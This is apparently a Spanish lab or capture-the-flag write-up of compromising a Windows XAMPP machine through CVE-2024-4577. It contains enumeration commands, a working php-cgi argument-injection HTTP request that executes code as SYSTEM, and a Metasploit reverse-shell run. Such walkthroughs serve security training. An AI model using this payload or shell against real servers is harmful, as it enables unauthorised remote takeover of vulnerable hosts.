Enumeramos puertos (máquina Windows con XAMPP):
❯ nmap -sCV -p 80,135,139,443,445,5985,47001,49664,49665,49666,49667,49668,49670 -oN 02-targeted.txt 192.168.1.12
...
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-title: Free Website Templates
443/tcp open ssl/http Apache httpd
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0
...
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsEnumerando encontramos /xampp, y leemos su versión y locale:
❯ gobuster dir -u 'http://192.168.1.12/xampp' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/quickhits.txt -r
...
/.version (Status: 200) [Size: 20]
...
❯ curl http://192.168.1.12/xampp/.version
8.2.12
LAN=日本語El locale es japonés, condición necesaria para CVE-2024-4577. Verificamos el RCE con Burp (el cuerpo se ejecuta como PHP):
GET /php-cgi/php-cgi.exe?%add+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.1.12
Redirect-Status: 200
Content-Length: 26
<?=`"whoami"`; exit();HTTP/1.1 200 OK
...
nt authority\systemPara una shell estable usamos el módulo de Metasploit:
msf6 > use exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577
msf6 exploit(...) > set payload php/reverse_php
msf6 exploit(...) > set rhosts 192.168.1.12
msf6 exploit(...) > run
[+] The target is vulnerable. Apache
[*] Command shell session 2 opened ...
whoami
nt authority\systemCon permisos SYSTEM, ambas flags están en el escritorio del Administrador:
cd C:\Users\Administrator\DesktopFin.